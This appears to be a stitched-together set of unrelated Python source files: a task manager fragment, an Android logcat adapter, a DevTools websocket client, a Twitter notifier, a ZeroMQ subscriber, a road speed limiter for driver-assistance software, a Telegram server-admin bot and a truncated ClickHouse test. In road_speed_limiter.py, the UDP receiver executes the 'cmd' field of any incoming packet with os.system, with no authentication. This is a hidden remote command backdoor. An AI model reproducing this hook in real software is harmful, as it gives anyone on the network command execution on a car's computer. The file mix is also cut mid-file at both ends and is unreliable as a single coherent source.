disable_existing_loggers=False)
config = parse_config('/'.join([path, 'etc', 'vddb_async.conf']))
start_dbpc(config, 'task_manager')
# make db connection pool, assign 1 connection to each db accessing thread
# kingship checker + db loader + task fetcher +
# task cleanup : a total of 4 threads, + 1 manager thread pool
db_pool = make_db_pool(config, DB_RESERVE_CONN + int(config['cleaner_threads_num']))
# kingship granted event, all threads wait till this event is set
hbase_pool = make_hbase_pool(config)
kev = Event()
kev.clear()
# db load finished eventm all threads wait till this event is set
lev = Event()
lev.clear()
# conditions each thread wait on, named after the waiter
fetch_cond = Condition(Lock())
pick_cond = Condition(Lock())
manage_cond = Condition(Lock())
clean_cond = Condition(Lock())
# kingship checker
check = Thread(target=check_kingship,
args=(config, db_pool, kev, config['tm_module_name'],
# NOTE: if task manager stops working for X minutes, the
# tasks won't be scheduled and executed for X
# minutes since tasks have to be finished in a
# timely fashion, the task manager master timeout
# should not be too long
int(config['tm_master_timeout']),
logging.getLogger('mwtm_tmcheck')))
check.start()
# all other threads wait here
kev.wait()
# this event is never cleared
#assert kev.isSet()
# worker threads, created in dependence order
fetch = fetcher(config, db_pool, fetch_cond, pick_cond)
clean = cleaner_cluster(config, db_pool, hbase_pool, clean_cond, manage_cond)
manage = manager(config, db_pool, manage_cond, pick_cond, clean)
pick = picker(config, pick_cond, fetch, manage)
# db config observers, loader will notify them when there's new data loaded
observers = [fetch, pick, manage, clean]
load = Thread(target=load_database, args=(config, db_pool, lev, observers))
# start the loader, and make other threads wait for the first load
load.start()
lev.wait()
assert lev.isSet()
# start all other threads
fetch.start()
clean.start()
manage.start()
pick.start()
# threads never returns, so joining is quite pointless here
main()
|
logcat.py
|
import subprocess
import logging
import copy
from .adapter import Adapter
class Logcat(Adapter):
"""
A connection with the target device through logcat.
"""
def __init__(self, device=None):
"""
initialize logcat connection
:param device: a Device instance
"""
self.logger = logging.getLogger(self.__class__.__name__)
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.connected = False
self.process = None
self.parsers = []
self.recent_lines = []
if device.output_dir is None:
self.out_file = None
else:
self.out_file = "%s/logcat.txt" % device.output_dir
def connect(self):
self.device.adb.run_cmd("logcat -c")
self.process = subprocess.Popen(["adb", "-s", self.device.serial, "logcat", "-v", "threadtime", "*:I"],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
import threading
listen_thread = threading.Thread(target=self.handle_output)
listen_thread.start()
def disconnect(self):
self.connected = False
if self.process is not None:
self.process.terminate()
def check_connectivity(self):
return self.connected
def get_recent_lines(self):
lines = self.recent_lines
self.recent_lines = []
return lines
def handle_output(self):
self.connected = True
f = None
if self.out_file is not None:
f = open(self.out_file, 'w', encoding='utf-8')
while self.connected:
if self.process is None:
continue
line = self.process.stdout.readline()
if not isinstance(line, str):
line = line.decode()
self.recent_lines.append(line)
self.parse_line(line)
if f is not None:
f.write(line)
if f is not None:
f.close()
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def parse_line(self, logcat_line):
for parser in self.parsers:
parser.parse(logcat_line)
|
tab.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import json
import logging
import warnings
import threading
import functools
import websocket
from .exceptions import *
try:
import Queue as queue
except ImportError:
import queue
__all__ = ["Tab"]
logger = logging.getLogger(__name__)
class GenericAttr(object):
def __init__(self, name, tab):
self.__dict__['name'] = name
self.__dict__['tab'] = tab
def __getattr__(self, item):
method_name = "%s.%s" % (self.name, item)
event_listener = self.tab.get_listener(method_name)
if event_listener:
return event_listener
return functools.partial(self.tab.call_method, method_name)
def __setattr__(self, key, value):
self.tab.set_listener("%s.%s" % (self.name, key), value)
class Tab(object):
status_initial = 'initial'
status_started = 'started'
status_stopped = 'stopped'
def __init__(self, **kwargs):
self.id = kwargs.get("id")
self.type = kwargs.get("type")
self.debug = os.getenv("DEBUG", False)
self._websocket_url = kwargs.get("webSocketDebuggerUrl")
self._kwargs = kwargs
self._cur_id = 1000
self._ws = None
self._recv_th = threading.Thread(target=self._recv_loop)
self._recv_th.daemon = True
self._handle_event_th = threading.Thread(target=self._handle_event_loop)
self._handle_event_th.daemon = True
self._stopped = threading.Event()
self._started = False
self.status = self.status_initial
self.event_handlers = {}
self.method_results = {}
self.event_queue = queue.Queue()
def _send(self, message, timeout=None):
if 'id' not in message:
self._cur_id += 1
message['id'] = self._cur_id
message_json = json.dumps(message)
if self.debug: # pragma: no cover
print("SEND > %s" % message_json)
if not isinstance(timeout, (int, float)) or timeout > 1:
q_timeout = 1
else:
q_timeout = timeout / 2.0
try:
self.method_results[message['id']] = queue.Queue()
# just raise the exception to user
self._ws.send(message_json)
while not self._stopped.is_set():
try:
if isinstance(timeout, (int, float)):
if timeout < q_timeout:
q_timeout = timeout
timeout -= q_timeout
return self.method_results[message['id']].get(timeout=q_timeout)
except queue.Empty:
if isinstance(timeout, (int, float)) and timeout <= 0:
raise TimeoutException("Calling %s timeout" % message['method'])
continue
raise UserAbortException("User abort, call stop() when calling %s" % message['method'])
finally:
self.method_results.pop(message['id'], None)
def _recv_loop(self):
while not self._stopped.is_set():
try:
self._ws.settimeout(1)
message_json = self._ws.recv()
message = json.loads(message_json)
except websocket.WebSocketTimeoutException:
continue
except (websocket.WebSocketException, OSError):
if not self._stopped.is_set():
logger.error("websocket exception", exc_info=True)
self._stopped.set()
return
if self.debug: # pragma: no cover
print('< RECV %s' % message_json)
if "method" in message:
self.event_queue.put(message)
elif "id" in message:
if message["id"] in self.method_results:
self.method_results[message['id']].put(message)
else: # pragma: no cover
warnings.warn("unknown message: %s" % message)
def _handle_event_loop(self):
while not self._stopped.is_set():
try:
event = self.event_queue.get(timeout=1)
except queue.Empty:
continue
if event['method'] in self.event_handlers:
try:
self.event_handlers[event['method']](**event['params'])
except Exception as e:
logger.error("callback %s exception" % event['method'], exc_info=True)
self.event_queue.task_done()
def __getattr__(self, item):
attr = GenericAttr(item, self)
setattr(self, item, attr)
return attr
def call_method(self, _method, *args, **kwargs):
if not self._started:
raise RuntimeException("Cannot call method before it is started")
if args:
raise CallMethodException("the params should be key=value format")
if self._stopped.is_set():
raise RuntimeException("Tab has been stopped")
timeout = kwargs.pop("_timeout", None)
result = self._send({"method": _method, "params": kwargs}, timeout=timeout)
if 'result' not in result and 'error' in result:
warnings.warn("%s error: %s" % (_method, result['error']['message']))
raise CallMethodException("calling method: %s error: %s" % (_method, result['error']['message']))
return result['result']
def set_listener(self, event, callback):
if not callback:
return self.event_handlers.pop(event, None)
if not callable(callback):
raise RuntimeException("callback should be callable")
self.event_handlers[event] = callback
return True
def get_listener(self, event):
return self.event_handlers.get(event, None)
def del_all_listeners(self):
self.event_handlers = {}
return True
def start(self):
if self._started:
return False
if not self._websocket_url:
raise RuntimeException("Already has another client connect to this tab")
self._started = True
self.status = self.status_started
self._stopped.clear()
self._ws = websocket.create_connection(self._websocket_url, enable_multithread=True)
self._recv_th.start()
self._handle_event_th.start()
return True
def stop(self):
if self._stopped.is_set():
return False
if not self._started:
raise RuntimeException("Tab is not running")
self.status = self.status_stopped
self._stopped.set()
if self._ws:
self._ws.close()
return True
def wait(self, timeout=None):
if not self._started:
raise RuntimeException("Tab is not running")
if timeout:
return self._stopped.wait(timeout)
self._recv_th.join()
self._handle_event_th.join()
return True
def __str__(self):
return "<Tab [%s]>" % self.id
__repr__ = __str__
|
TFFPNotifier.py
|
from .NotifierClass import Notifier
import twitter
from datetime import datetime, timedelta
import time
import threading
class TFFPNotifier(Notifier):
def __init__(self,cfgParser,insec):
self.header = insec
try:
self.screenname = cfgParser.get(insec,"username").strip()
except:
self.screenname = ''
self.conskey = cfgParser.get(insec,"conskey").strip()
self.conssecret = cfgParser.get(insec,"conssecret").strip()
self.acctokenkey = cfgParser.get(insec,"acctokenkey").strip()
self.acctokensecret = cfgParser.get(insec,"acctokensecret").strip()
self.waitminutes = cfgParser.getint(insec,"waitminutes")
try:
self.hashtag = cfgParser.get(insec,"hashtag").strip()
except:
self.hashtag = "#tweetsfromfirstplace"
try:
self.viatag = cfgParser.get(insec,"viatag").strip()
except:
self.viatag = "/via bot"
def pushResults(self,newres):
# the only thing this cares about is the final, and *that* only matters once x minutes have passed.
if "finals" in newres:
for finalDict in newres["finals"]:
if "result" in finalDict:
if (finalDict["result"] == "win" and "1st" in finalDict["standings"]):
waittweet = threading.Thread(target=self._wait_and_tweet,args=())
#print "thread constructed"
waittweet.start()
def _wait_and_tweet(self):
api = twitter.Api(consumer_key=self.conskey, consumer_secret=self.conssecret,
access_token_key=self.acctokenkey, access_token_secret=self.acctokensecret)
#print "got api, waiting"
if self.screenname == '':
api.PostUpdate(self.hashtag + " " + self.viatag)
else:
time.sleep(60*self.waitminutes)
#print "calling has_t"
if not self._has_tweeted(api):
#print "tweeting!"
api.PostUpdate(self.hashtag + " " + self.viatag)
def _has_tweeted(self,api):
tl = api.GetUserTimeline(screen_name=self.screenname)
curt = datetime.utcnow()
for st in tl:
st_datetime = datetime.strptime(st.created_at,"%a %b %d %H:%M:%S +0000 %Y")
if ( (curt-st_datetime) > timedelta(minutes=self.waitminutes+10) ):
# we're out of tweets within the range we have to care about
break
elif self.hashtag in st.text:
# already tweeted, go home
return True
return False
|
subscribe.py
|
# coding=utf-8
import zmq
import threading
import uuid
from google.protobuf.message import DecodeError
from fysom import Fysom
import machinetalk.protobuf.types_pb2 as pb
from machinetalk.protobuf.message_pb2 import Container
class Subscribe(object):
def __init__(self, debuglevel=0, debugname='Subscribe'):
self.debuglevel = debuglevel
self.debugname = debugname
self._error_string = ''
self.on_error_string_changed = []
# ZeroMQ
context = zmq.Context()
context.linger = 0
self._context = context
# pipe to signalize a shutdown
self._shutdown = context.socket(zmq.PUSH)
self._shutdown_uri = b'inproc://shutdown-%s' % str(uuid.uuid4()).encode()
self._shutdown.bind(self._shutdown_uri)
self._thread = None # socket worker tread
self._tx_lock = threading.Lock() # lock for outgoing messages
# Socket
self.socket_uri = ''
self._socket_topics = set()
# more efficient to reuse protobuf messages
self._socket_rx = Container()
# Heartbeat
self._heartbeat_lock = threading.Lock()
self._heartbeat_interval = 2500
self._heartbeat_timer = None
self._heartbeat_active = False
self._heartbeat_liveness = 0
self._heartbeat_reset_liveness = 5
# callbacks
self.on_socket_message_received = []
self.on_state_changed = []
# fsm
self._fsm = Fysom(
{
'initial': 'down',
'events': [
{'name': 'start', 'src': 'down', 'dst': 'trying'},
{'name': 'full_update_received', 'src': 'trying', 'dst': 'up'},
{'name': 'stop', 'src': 'trying', 'dst': 'down'},
{'name': 'heartbeat_timeout', 'src': 'up', 'dst': 'trying'},
{'name': 'heartbeat_tick', 'src': 'up', 'dst': 'up'},
{'name': 'any_msg_received', 'src': 'up', 'dst': 'up'},
{'name': 'stop', 'src': 'up', 'dst': 'down'},
],
}
)
self._fsm.ondown = self._on_fsm_down
self._fsm.onafterstart = self._on_fsm_start
self._fsm.ontrying = self._on_fsm_trying
self._fsm.onafterfull_update_received = self._on_fsm_full_update_received
self._fsm.onafterstop = self._on_fsm_stop
self._fsm.onup = self._on_fsm_up
self._fsm.onafterheartbeat_timeout = self._on_fsm_heartbeat_timeout
self._fsm.onafterheartbeat_tick = self._on_fsm_heartbeat_tick
self._fsm.onafterany_msg_received = self._on_fsm_any_msg_received
def _on_fsm_down(self, _):
if self.debuglevel > 0:
print('[%s]: state DOWN' % self.debugname)
for cb in self.on_state_changed:
cb('down')
return True
def _on_fsm_start(self, _):
if self.debuglevel > 0:
print('[%s]: event START' % self.debugname)
self.start_socket()
return True
def _on_fsm_trying(self, _):
if self.debuglevel > 0:
print('[%s]: state TRYING' % self.debugname)
for cb in self.on_state_changed:
cb('trying')
return True
def _on_fsm_full_update_received(self, _):
if self.debuglevel > 0:
print('[%s]: event FULL UPDATE RECEIVED' % self.debugname)
self.reset_heartbeat_liveness()
self.start_heartbeat_timer()
return True
def _on_fsm_stop(self, _):
if self.debuglevel > 0:
print('[%s]: event STOP' % self.debugname)
self.stop_heartbeat_timer()
self.stop_socket()
return True
def _on_fsm_up(self, _):
if self.debuglevel > 0:
print('[%s]: state UP' % self.debugname)
for cb in self.on_state_changed:
cb('up')
return True
def _on_fsm_heartbeat_timeout(self, _):
if self.debuglevel > 0:
print('[%s]: event HEARTBEAT TIMEOUT' % self.debugname)
self.stop_heartbeat_timer()
self.stop_socket()
self.start_socket()
return True
def _on_fsm_heartbeat_tick(self, _):
if self.debuglevel > 0:
print('[%s]: event HEARTBEAT TICK' % self.debugname)
self.reset_heartbeat_timer()
return True
def _on_fsm_any_msg_received(self, _):
if self.debuglevel > 0:
print('[%s]: event ANY MSG RECEIVED' % self.debugname)
self.reset_heartbeat_liveness()
self.reset_heartbeat_timer()
return True
@property
def error_string(self):
return self._error_string
@error_string.setter
def error_string(self, string):
if self._error_string is string:
return
self._error_string = string
for cb in self.on_error_string_changed:
cb(string)
def start(self):
if self._fsm.isstate('down'):
self._fsm.start()
def stop(self):
if self._fsm.isstate('trying'):
self._fsm.stop()
elif self._fsm.isstate('up'):
self._fsm.stop()
def add_socket_topic(self, name):
self._socket_topics.add(name)
def remove_socket_topic(self, name):
self._socket_topics.remove(name)
def clear_socket_topics(self):
self._socket_topics.clear()
def _socket_worker(self, context, uri):
poll = zmq.Poller()
socket = context.socket(zmq.SUB)
socket.setsockopt(zmq.LINGER, 0)
socket.connect(uri)
poll.register(socket, zmq.POLLIN)
# subscribe is always connected to socket creation
for topic in self._socket_topics:
socket.setsockopt(zmq.SUBSCRIBE, topic.encode())
shutdown = context.socket(zmq.PULL)
shutdown.connect(self._shutdown_uri)
poll.register(shutdown, zmq.POLLIN)
while True:
s = dict(poll.poll())
if shutdown in s:
shutdown.recv()
return # shutdown signal
if socket in s:
self._socket_message_received(socket)
def start_socket(self):
self._thread = threading.Thread(
target=self._socket_worker, args=(self._context, self.socket_uri)
)
self._thread.start()
def stop_socket(self):
self._shutdown.send(b' ') # trigger socket thread shutdown
self._thread = None
def _heartbeat_timer_tick(self):
with self._heartbeat_lock:
self._heartbeat_timer = None # timer is dead on tick
if self.debuglevel > 0:
print('[%s] heartbeat timer tick' % self.debugname)
self._heartbeat_liveness -= 1
if self._heartbeat_liveness == 0:
if self._fsm.isstate('up'):
self._fsm.heartbeat_timeout()
return
if self._fsm.isstate('up'):
self._fsm.heartbeat_tick()
def reset_heartbeat_liveness(self):
self._heartbeat_liveness = self._heartbeat_reset_liveness
def reset_heartbeat_timer(self):
if not self._heartbeat_active:
return
self._heartbeat_lock.acquire()
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
self._heartbeat_timer = None
if self._heartbeat_interval > 0:
self._heartbeat_timer = threading.Timer(
self._heartbeat_interval / 1000.0, self._heartbeat_timer_tick
)
self._heartbeat_timer.start()
self._heartbeat_lock.release()
if self.debuglevel > 0:
print('[%s] heartbeat timer reset' % self.debugname)
def start_heartbeat_timer(self):
self._heartbeat_active = True
self.reset_heartbeat_timer()
def stop_heartbeat_timer(self):
self._heartbeat_active = False
self._heartbeat_lock.acquire()
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
self._heartbeat_timer = None
self._heartbeat_lock.release()
# process all messages received on socket
def _socket_message_received(self, socket):
(identity, msg) = socket.recv_multipart() # identity is topic
try:
self._socket_rx.ParseFromString(msg)
except DecodeError as e:
note = 'Protobuf Decode Error: ' + str(e)
print(note) # TODO: decode error
return
if self.debuglevel > 0:
print('[%s] received message' % self.debugname)
if self.debuglevel > 1:
print(self._socket_rx)
rx = self._socket_rx
# react to any incoming message
if self._fsm.isstate('up'):
self._fsm.any_msg_received()
# react to ping message
if rx.type == pb.MT_PING:
return # ping is uninteresting
# react to full update message
elif rx.type == pb.MT_FULL_UPDATE:
if rx.HasField('pparams'):
interval = rx.pparams.keepalive_timer
self._heartbeat_interval = interval
if self._fsm.isstate('trying'):
self._fsm.full_update_received()
for cb in self.on_socket_message_received:
cb(identity, rx)
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import clip, mean
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
# gps = Thread(target=self.gps_thread, args=[])
# gps.setDaemon(True)
# gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def send_sdp(self, sock):
try:
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
ret = False
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
ret = False
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.send_sdp(sock)
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.started_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
#cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
starting_dist = v_ego * 30.
safe_dist = v_ego * 6.
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
if not self.slowing_down:
self.started_dist = cam_limit_speed_left_dist
self.slowing_down = True
first_started = True
else:
first_started = False
td = self.started_dist - safe_dist
d = cam_limit_speed_left_dist - safe_dist
if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
pp = (d / td) ** 0.6
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter
if __name__ == "__main__":
main()
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
from threading import Thread
import logging
import pickle
import time
import subprocess
from functools import wraps
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext import MessageHandler, Filters
from telegram import ChatAction
from secret import allowed_ids
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
# read the telegram token
with open("token", "r") as fd:
token = fd.readline().strip()
LIST_OF_ADMINS = list(allowed_ids.values())
logging.info("List of admins: {}".format(LIST_OF_ADMINS))
#------------------------------- Telegram wrapper functions -------------------------------
def restricted(func):
@wraps(func)
def wrapped(update, context, *args, **kwargs):
logger = logging.getLogger()
user_id = context.effective_user.id
logger.debug("Getting restricted call by {}".format(user_id))
if user_id not in LIST_OF_ADMINS:
logger.info("Unauthorized access denied for {}.".format(user_id))
return
return func(update, context, *args, **kwargs)
return wrapped
def send_action(action):
"""Sends `action` while processing func command."""
def decorator(func):
@wraps(func)
def command_func(*args, **kwargs):
bot, update = args
bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)
return func(bot, update, **kwargs)
return command_func
return decorator
send_typing_action = send_action(ChatAction.TYPING)
send_upload_video_action = send_action(ChatAction.UPLOAD_VIDEO)
send_upload_photo_action = send_action(ChatAction.UPLOAD_PHOTO)
#----------------------------- Helper functions -----------------------------
def get_text_from_message(message):
logger = logging.getLogger()
logger.debug("Got message to split: {}".format(message))
text = message.split(" ", 1)[1:]
logger.debug("Text output: {}".format(text))
if text:
return text[0]
else:
return ""
#------------------------------- My functions -------------------------------
class CommandCache(str):
def __init__(self, string):
super().__init__()
self.timestamp = time.time()
def execute_shell(cmd):
logger = logging.getLogger()
cmd_list = cmd.strip().split()
# WARNING, this should be sanitized beforehand as this is user input
logger.debug(cmd_list)
try:
out = subprocess.check_output(cmd_list)
return out.decode("utf-8")
except FileNotFoundError:
logger.error("Binary not found")
except subprocess.CalledProcessError:
logger.error("Non-zero exit status")
def restart_servers(servers=""):
logger = logging.getLogger()
now = time.time()
try:
logger.debug("When was the last time this server was restarted")
with open("/tmp/mscs_restarted.pickle", "rb") as f:
last_restarted = pickle.load(f)
if now-last_restarted < 30:
logger.info("Restarted in the last 30s, not restarting.")
ret = "Restarted in the last 30s, not restarting."
else:
raise FileNotFoundError
except (FileNotFoundError, EOFError):
with open("/tmp/mscs_restarted.pickle", "wb") as f:
pickle.dump(now, f)
ret = execute_shell("mscs restart {}".format(servers))
return ret
def server_status(servers=""):
logger = logging.getLogger()
now = time.time()
try:
logger.debug("Trying to read cached command")
with open("/tmp/mscs_status.pickle", "rb") as f:
status = pickle.load(f)
if now-status.timestamp < 10:
logger.info("Cache valid")
ret = status
else:
logger.debug("Cache too old")
raise FileNotFoundError
except (FileNotFoundError, EOFError):
ret = execute_shell("mscs status {}".format(servers))
with open("/tmp/mscs_status.pickle", "wb") as f:
pickle.dump(CommandCache(ret), f)
return ret
# error handling
def error(bot, update, error):
logger = logging.getLogger()
logger.warning('Update "%s" caused error "%s"' % (update, error))
#--------------------------- main function with all handlers ----------------------------
def main():
logger = logging.getLogger()
updater = Updater(token=token)
dispatcher = updater.dispatcher
# Add your other handlers here...
# MessageHandler will handle messages and
# CommandHandler will hanle /messages
# this means telegram.ext.filters are applied beforehand
# such that e.g. audio and video are not reaching the handler
def stop_and_restart():
"""Gracefully stop the Updater and replace the current process with a new one"""
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(bot, update):
update.message.reply_text('Bot is restarting...')
Thread(target=stop_and_restart).start()
dispatcher.add_handler(CommandHandler('r', restart,
filters=Filters.user(username='@conrad784')))
def start(bot, update):
bot.send_message(chat_id=update.message.chat_id,
text="This Bot is work in progress, expect it not to work!")
logger.info("Started by: {}".format(update.message.from_user))
start_handler = CommandHandler('start', start)
dispatcher.add_handler(start_handler)
def echo(bot, update):
logger.debug("Echoing '{}' to id: {}".format(update.message.text, update.message.chat_id))
bot.send_message(chat_id=update.message.chat_id, text=update.message.text)
echo_handler = MessageHandler(Filters.text, echo)
dispatcher.add_handler(echo_handler)
@restricted
@send_typing_action
def mscs_restart(bot, update):
msg = update.message
servers = get_text_from_message(msg.text)
logger.info("Server restarted by id {}".format(msg.from_user))
logger.debug("With message {}".format(msg.text))
ret = restart_servers(servers)
bot.send_message(chat_id=update.message.chat_id, text="{}".format(ret))
mscs_restart_handler = CommandHandler("mscs_restart", mscs_restart)
dispatcher.add_handler(mscs_restart_handler)
@restricted
@send_typing_action
def mscs_status(bot, update):
msg = update.message
servers = get_text_from_message(msg.text)
logger.info("Server status issued by '{}'".format(msg.from_user))
logger.debug("With message {}".format(msg.text))
ret = server_status(servers)
bot.send_message(chat_id=update.message.chat_id, text="{}".format(ret))
mscs_status_handler = CommandHandler("mscs_status", mscs_status)
dispatcher.add_handler(mscs_status_handler)
def unknown(bot, update):
bot.send_message(chat_id=update.message.chat_id, text="Sorry, I didn't understand that command.")
unknown_handler = MessageHandler(Filters.command, unknown)
dispatcher.add_handler(unknown_handler)
# handle errors
dispatcher.add_error_handler(error)
# start Bot
logger.info("Starting Bot")
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
test.py
|
import threading
import time
import pytest
from helpers.cluster import ClickHouseCluster
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 1})
node2 = cluster.add_instance('node2',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 2})
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
node1.query('CREATE DATABASE test ENGINE=Ordinary') # Different paths with Atomic
